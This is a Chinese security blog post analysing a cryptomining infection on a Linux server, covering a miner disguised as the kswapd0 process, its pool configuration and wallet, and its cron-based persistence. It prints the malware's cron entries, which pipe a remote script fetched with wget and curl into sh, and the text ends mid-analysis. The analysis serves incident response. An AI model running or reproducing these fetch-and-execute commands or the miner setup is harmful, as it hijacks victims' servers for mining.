分你所享、信息共享、轻松分享
来自民间的思想 | 送人玫瑰,手有余香。

Linux系统ETN挖矿病毒实例分析

*本文原创作者:cgf99,本文属FreeBuf原创奖励计划,未经许可禁止转载

一、背景

近期,客户向华屹安全团队通报其服务器运行异常。经过安全技术人员的检查,发现了这是一例典型的利用Linux服务器漏洞实施XMR挖矿的安全事件。当前网络安全事件中黑客利用系统漏洞实施挖矿的事件频见报道,而本团队在实际工作中却头回遇见,因此对该样本实施了具体分析。

二、技术具体分析

1、主机环境为Linux

2、发现一异常进程,其运行情况为:

./kswapd0 -c ksvjptcyah.cf -t 2 连接的端口是148.251.133.246的80。 利用IP查询,发现其是德国的服务器。具体如下图所示: 图片.png 直接用浏览器访问,其返回的是mining server online,如下图所示,由此可见该服务器应该是一台矿池服务器。 图片.png 还发现,该服务器还开放5555端口(返回和80端口一致)、8080端口。用浏览器直接访问8080端口,发现其是electroneum矿池。其主页返回如下图所示: 图片.png

3、发现进程kswapd0位于/var/tmp目录下,该目录下同时还存放ksvjptcyah.cf文件。其中ksvjptcyah.cf文件的内容如下所示:

ksvjptcyah.cf内容 {"url" : "stratum+tcp://148.251.133.246:80","user" :"etnkN7n6nSXjPNxVjFFqjaCHdaXBHR2q3cWUnd5ZEtnvAVKKYRrucRgF34XdY2cMfAEUsTrUFJNGvgK4q2dQFfsY41pihj9PMc","pass" : "x","algo" : "cryptonight","quiet" : true} 显然,这是挖矿程序的配置文件。 其中矿池地址为:148.251.133.246:80 挖矿帐号为:etnkN7n6nSXjPNxVjFFqjaCHdaXBHR2q3cWUnd5ZEtnvAVKKYRrucRgF34XdY2cMfAEUsTrUFJNGvgK4q2dQFfsY41pihj9PMc Quiet表示在后台安静的挖矿。 在该矿池的界面,通过搜索发现该帐号挖矿的具体情况如下图所示: 图片.png 如上图所示,挖的是ETN币。每秒的hash rate为159.45KH。说明该病毒至少感染了成百上千台了(如果假设一台主机60-1000H/S的情况)。

4、利用kill杀掉kswapd0进程。

过一会发现,又出来相同异常进程,进程会变化, ./ Ksvjptcyah -c Ksvjptcyah .cf -t 2。

5、查找其启动方式,根据以往经验,一般病毒会利用定时任务启动。

果然,发现启动任务如下: */29 * * * * wget -O - -qhttp://181.214.87.241/java/oracle.jpg|sh*/30 * * * * curlhttp://181.214.87.241/java/oracle.jpg|sh 利用ip138查询,发现181.214.87.241是一台位于美国或者智利的机器。查询结果如下图所示: